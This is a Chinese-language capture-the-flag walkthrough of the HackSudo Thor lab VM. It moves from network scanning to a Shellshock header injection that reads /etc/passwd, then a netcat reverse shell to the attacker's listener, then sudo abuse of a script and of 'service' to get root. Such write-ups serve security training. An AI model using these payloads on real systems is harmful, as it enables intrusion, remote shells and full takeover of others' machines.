1. IP探測

┌──(root?kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.0.140
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     b8:3a:08:3b:f9:30       Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.130   08:00:27:4b:48:b0       PCS Systemtechnik GmbH
192.168.0.139   7c:b5:66:a5:f0:a5       Intel Corporate
192.168.0.101   42:fd:92:b5:74:21       (Unknown: locally administered)4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 4 responded

┌──(root?kali)-[~]
└─# nmap -Pn 192.168.0.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:07 EST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.026s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: B8:3A:08:3B:F9:30 (Tenda Technology,Ltd.Dongguan branch)Nmap scan report for 192.168.0.101 (192.168.0.101)
Host is up (0.019s latency).
All 1000 scanned ports on 192.168.0.101 (192.168.0.101) are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 42:FD:92:B5:74:21 (Unknown)Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.00033s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)Nmap scan report for 192.168.0.139 (192.168.0.139)
Host is up (0.00038s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 7C:B5:66:A5:F0:A5 (Intel Corporate)Nmap scan report for 192.168.0.140 (192.168.0.140)
Host is up (0.0000040s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  sshNmap done: 256 IP addresses (5 hosts up) scanned in 18.55 seconds

192.168.0.130

2.端口服務掃描

┌──(root?kali)-[~]
└─# nmap -p- 192.168.0.130 --min-rate 1000    
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:09 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.0025s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

┌──(root?kali)-[~]
└─# nmap -sC -sV -O 192.168.0.130 --min-rate 1000 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:08 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.00088s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3736603e26ae233fe18b5d18e7a7c7ce (RSA)
|   256 349a57607d6670d5b5ff4796e0362375 (ECDSA)
|_  256 ae7deefe1dbc994d54453d6116f86c87 (ED25519)
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.82 seconds

3.網(wǎng)站漏洞掃描

┌──(root?kali)-[~]
└─# nmap --script=vuln -p21,22,80 192.168.0.130 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:12 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.0011s latency).PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /admin_login.php: Possible admin folder
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.130
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.0.130:80/
|     Form id: 
|     Form action: customer_login_action.php
|     
|     Path: http://192.168.0.130:80/home.php
|     Form id: 
|     Form action: customer_login_action.php
|     
|     Path: http://192.168.0.130:80/customer_login_action.php
|     Form id: 
|_    Form action: customer_login_action.php
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 32.61 seconds

┌──(root?kali)-[~]
└─# nikto -h 192.168.0.130                                      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.130
+ Target Hostname:    192.168.0.130
+ Target Port:        80
+ Start Time:         2024-02-11 08:14:15 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-02-11 08:15:05 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested*********************************************************************Portions of the server's headers (Apache/2.4.38) are not inthe Nikto 2.1.6 database or are newer than the known string. Would you liketo submit this information (*no server specific data*) to CIRT.netfor a Nikto update (or you may email to sullo@cirt.net) (y/n)? y+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
- Sent updated info to cirt.net -- Thank you!

4.目錄掃描

┌──(root?kali)-[~]
└─# dirsearch -u "http://192.168.0.130"          _|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460Output File: /root/reports/http_192.168.0.130/_24-02-11_08-11-40.txtTarget: http://192.168.0.130/[08:11:40] Starting: 
[08:11:42] 403 -  278B  - /.ht_wsr.txt                                      
[08:11:42] 403 -  278B  - /.htaccess.sample                                 
[08:11:42] 403 -  278B  - /.htaccess.bak1                                   
[08:11:42] 403 -  278B  - /.htaccess_extra
[08:11:42] 403 -  278B  - /.htaccess_orig
[08:11:42] 403 -  278B  - /.htaccess.orig
[08:11:42] 403 -  278B  - /.htaccessOLD2
[08:11:42] 403 -  278B  - /.htaccessOLD                                     
[08:11:42] 403 -  278B  - /.htaccessBAK
[08:11:42] 403 -  278B  - /.html                                            
[08:11:42] 403 -  278B  - /.htm                                             
[08:11:42] 403 -  278B  - /.htaccess_sc
[08:11:42] 403 -  278B  - /.htaccess.save
[08:11:42] 403 -  278B  - /.htpasswd_test
[08:11:42] 403 -  278B  - /.htpasswds                                       
[08:11:42] 403 -  278B  - /.httr-oauth                                      
[08:11:43] 403 -  278B  - /.php                                             
[08:11:51] 302 -    7KB - /admin_home.php  ->  home.php                     
[08:11:51] 200 -  489B  - /admin_login.php                                  
[08:11:59] 403 -  278B  - /cgi-bin/                                         
[08:12:01] 200 -    1KB - /contact.php                                      
[08:12:06] 301 -  314B  - /fonts  ->  http://192.168.0.130/fonts/           
[08:12:08] 200 -  278B  - /header.php                                       
[08:12:08] 200 -    2KB - /home.php                                         
[08:12:09] 301 -  315B  - /images  ->  http://192.168.0.130/images/         
[08:12:09] 200 -  666B  - /images/                                          
[08:12:16] 200 -    3KB - /news.php                                         
[08:12:23] 200 -    4KB - /README.md                                        
[08:12:25] 403 -  278B  - /server-status                                    
[08:12:25] 403 -  278B  - /server-status/                                   Task Completed 

┌──(root?kali)-[~]
└─# dirb http://192.168.0.130          -----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Sun Feb 11 08:14:49 2024
URL_BASE: http://192.168.0.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.0.130/ ----
+ http://192.168.0.130/cgi-bin/ (CODE:403|SIZE:278)                                 
==> DIRECTORY: http://192.168.0.130/fonts/                                          
==> DIRECTORY: http://192.168.0.130/images/                                         
+ http://192.168.0.130/index.php (CODE:200|SIZE:5357)                               
+ http://192.168.0.130/server-status (CODE:403|SIZE:278)                            ---- Entering directory: http://192.168.0.130/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.0.130/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)-----------------
END_TIME: Sun Feb 11 08:14:59 2024
DOWNLOADED: 4612 - FOUND: 3

5.信息分析

通過上面一系列的探測，可以得到靶機：192.168.0.130，開放了21（被防火墻過濾），22（ssh服務），80（http服務）
訪問80端口頁面，看看有什么信息，一個登陸頁面，并沒有發(fā)現(xiàn)什么。

訪問dirsearch，掃出來的目錄/admin_login.php，是一個后臺登陸的頁面，嘗試弱密碼登陸，不行，還有一個/README.md目錄，下載以后，
看到admin/password123賬號密碼，登陸成功

在Manage Customers中找到四個用戶密碼。

6.破殼漏洞(Shellshock)

破殼漏洞（Shellshock）是指一個影響Unix和Linux操作系統(tǒng)的嚴重安全漏洞，它影響了Bash命令解釋器。該漏洞使攻擊者能夠在受影響的系統(tǒng)上執(zhí)行任意代碼，從而可能導致系統(tǒng)被入侵。
Shellshock漏洞的原因是Bash解釋器在處理特定的環(huán)境變量時存在一個安全漏洞，攻擊者可以通過構造惡意的環(huán)境變量來執(zhí)行任意的Shell命令。這個漏洞的危害性很高，因為Bash是許多Unix系統(tǒng)和Linux系統(tǒng)中常用的Shell

得到了賬號密碼，也沒有什么用，一籌莫展的時候，發(fā)現(xiàn)http://192.168.0.130/news.php這個目錄，源代碼中看到亮眼的/cgi-bin/

訪問/cgi-bin目錄，狀態(tài)碼403，代表沒有權限，那我們掃一下這個目錄

┌──(root?kali)-[~]
└─# dirsearch -u "http://192.168.0.130/cgi-bin/"_|. _ _  _  _  _ _|_    v0.4.3                                                            (_||| _) (/_(_|| (_| )                                                                     Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460Output File: /root/reports/http_192.168.0.130/_cgi-bin__24-02-11_08-47-25.txtTarget: http://192.168.0.130/[08:47:25] Starting: cgi-bin/                                                               
[08:48:09] 500 -  611B  - /cgi-bin/shell.sh                                 Task Completed 

nmap—漏洞檢測

掃到shell.sh，看看是否有破殼漏洞
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh 192.168.0.130--script http-shellshock: http-shellshock 是一個用于檢測 Shellshock漏洞的腳本。Shellshock 是一個在 Bash shell 中發(fā)現(xiàn)的安全漏洞，允許遠程攻擊者執(zhí)行任意代碼

┌──(root?kali)-[~]
└─# nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh 192.168.0.130
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 09:07 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.0012s latency).PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|_      http://www.openwall.com/lists/oss-security/2014/09/24/10
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.58 seconds

CVE-2014-6271

直接去GitHub搜CVE-2014-6271，找exp

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \  http://localhost:8080/cgi-bin/vulnerablelocalhost:靶機IP地址
端口：80
vulnerable：漏洞入口-->shell.shcurl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \  http://192.168.0.130:80/cgi-bin/shell.sh

命令執(zhí)行成功

┌──(root?kali)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \  http://192.168.0.130/cgi-bin/shell.sh
curl: (3) URL using bad/illegal format or missing URLroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftpuser:x:1005:1004::/dev/null:/etc/
thor:x:1001:1001:,,,:/home/thor:/bin/bash
sddsd

7.nc反彈

┌──(root?kali)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 192.168.0.140 6666'" \  http://192.168.0.130/cgi-bin/shell.sh

┌──(root?kali)-[~]
└─# nc -lvnp 6666                                
listening on [any] 6666 ...
connect to [192.168.0.140] from (UNKNOWN) [192.168.0.130] 56356
python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.3$

8.提權

sudo -l 發(fā)現(xiàn)可執(zhí)行文件/home/thor/./hammer.sh，執(zhí)行，發(fā)現(xiàn)輸入的命令，會以thor用戶執(zhí)行，所以執(zhí)行bash，以Thor用戶新開一個bash環(huán)境。

bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on HackSudoThor:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser www-data may run the following commands on HackSudoThor:(thor) NOPASSWD: /home/thor/./hammer.shbash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.shHELLO want to talk to Thor?Enter Thor  Secret Key : id
id
Hey Dear ! I am id , Please enter your Secret massage : id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
Thank you for your precious time!
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.shHELLO want to talk to Thor?Enter Thor  Secret Key : bash
bash
Hey Dear ! I am bash , Please enter your Secret massage : bash
bash
id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)

9.service提權

python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser thor may run the following commands on HackSudoThor:(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service

https://gtfobins.github.io/gtfobins/service/

thor@HacksudoThor:/usr/lib/cgi-bin$ sudo service ../../bin/sh
sudo service ../../bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
proof.txt  root.txt
# cat root.txt
cat root.txt
rooted
# cat proof.txt
cat proof.txt
rooted                                                                                                  ████████                                  ??????██????                                ▓▓????▓▓  ????██                              ██????▓▓??▓▓  ????██                            ██????▓▓??????▓▓  ????██                          ██????▓▓??????????▓▓  ????▓▓      ██████            ▓▓????▓▓??????????????▓▓  ????▓▓  ▓▓??▓▓▓▓▓▓          ▓▓??▓▓??????????????????▓▓  ????▓▓??????▓▓██          ▓▓▓▓▓▓????  ????????  ????▓▓  ????▓▓??????██          ▓▓▓▓▓▓▓▓????  ????????  ??????  ????▓▓??▓▓??          ██▓▓▓▓▓▓????  ????????  ??????  ????▓▓              ██▓▓▓▓▓▓????  ????????  ??????  ????██            ██▓▓▓▓▓▓????  ????????  ????▓▓  ????██          ▓▓▓▓▓▓▓▓????????????????????▓▓  ????██        ▓▓▓▓▓▓▓▓????????????????????▓▓  ????██      ▓▓▓▓▓▓▓▓????  ????????  ????▓▓  ????██    ▓▓▓▓▓▓▓▓????  ????????  ????▓▓  ????██  ▓▓??▓▓▓▓▓▓▓▓????  ??????????????▓▓  ▓▓▓▓██▓▓??????▓▓▓▓▓▓▓▓????  ????????  ????▓▓  ████▓▓??????????▓▓▓▓▓▓▓▓????  ????  ????▓▓▓▓▓▓??████??????????██  ██▓▓▓▓??????????????▓▓▓▓██????████  ????????██      ██▓▓▓▓▓▓????  ??▓▓▓▓██????██  ??        ??            ██??????????██          ██▓▓▓▓▓▓????▓▓▓▓██????██    ??  ??  ??    ██  ????????▓▓              ▓▓▓▓▓▓▓▓▓▓▓▓▓▓????██      ??              ??      ██  ????????▓▓                ??▓▓▓▓▓▓▓▓▓▓????██        ??                      ██  ????????▓▓                    ??▓▓▓▓▓▓????██          ██  ????????██                        ??██▓▓██▓▓            ▓▓  ????????██                                                ██  ????????██                                                  ▓▓  ????????██                                                    ▓▓  ????????██                                                      ??▓▓??????????██                                                        ??▓▓??????????▓▓                                                          ??????????????▓▓                                                            ????????????▓▓                                                              ██??????????▓▓                                                                ██  ????????▓▓                                                                  ██  ????????▓▓                                                                    ██  ????????▓▓                                                                      ▓▓  ????????▓▓                                                                        ██  ??????????                                                                          ▓▓??????????██                                                                            ████▓▓▓▓??????██                                                                              ██??  ??▓▓▓▓??██                                                                                ▓▓??  ????▓▓██                                                                                  ▓▓??????▓▓██                                                                                    ██▓▓▓▓▓▓▓▓██                                                                                    ??▓▓▓▓▓▓▓▓??                                                                                    #